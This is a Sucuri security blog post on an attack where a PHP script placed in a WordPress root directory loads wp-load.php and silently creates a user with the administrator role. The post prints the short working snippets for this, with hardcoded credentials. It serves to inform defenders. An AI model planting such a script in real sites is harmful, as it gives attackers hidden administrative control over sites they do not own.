• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Labs Note

Attackers Silently add new user with Administrator role to WordPress sites

March 16, 2017Yuliyan Tsvetkov

FacebookTwitterSubscribe

Attackers tend to get smarter in order to avoid detection, as well as gain access to your WordPress site. They use legit functions of the WordPress core to create users, post spammy content, and other kinds of malicious activities.

Most of the cases where legit functions are used, attackers avoid combining that with obfuscation techniques to reduce the chances of being detected by antivirus solutions and regular scanners.

One case that we recently researched was just like that. The attacker placed a PHP script inside the root directory of the WordPress installation and included the wp-load.php file that gave him access to the core functions.

$wp_load_loc = "wp-load.php";require_once($wp_load_loc);

After loading the file, it is easy to create a WordPress user and set the role to administrator via the core functions.

$user_id = wp_create_user('username987', 'password987');$user = new WP_User($user_id);$user->set_role('administrator');

Having the administrator role allows attackers unlimited possibilities to harm your site and business. They can lock you out from the backend, and if you aren’t logging in very often, nor performing any security checks, these bogus ‘Administrator’ users could go undetected for a long time.

If you’ve noticed any suspicious activity, or your website recently got blacklisted, this could be an indication that something may be wrong. We highly recommend contacting a professional to  investigate the issues for you.

FacebookTwitterSubscribe

Categories: Sucuri Labs, Website Malware Infections, WordPress SecurityTags: Hacked Websites, Labs Note

About Yuliyan Tsvetkov

Yuliyan is Malware Researcher at Sucuri. He is always somewhere on the Internet digging for new malware and meantime helping extending the benchmarks for the PCI-DSS standard. In his free time you can find him skiing in the big mountain. Find him on Twitter @yuliyantsvetkov

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

WordPress Security Course

The Anatomy of Website Malware Webinar

WordPress Security Guide

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2022 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.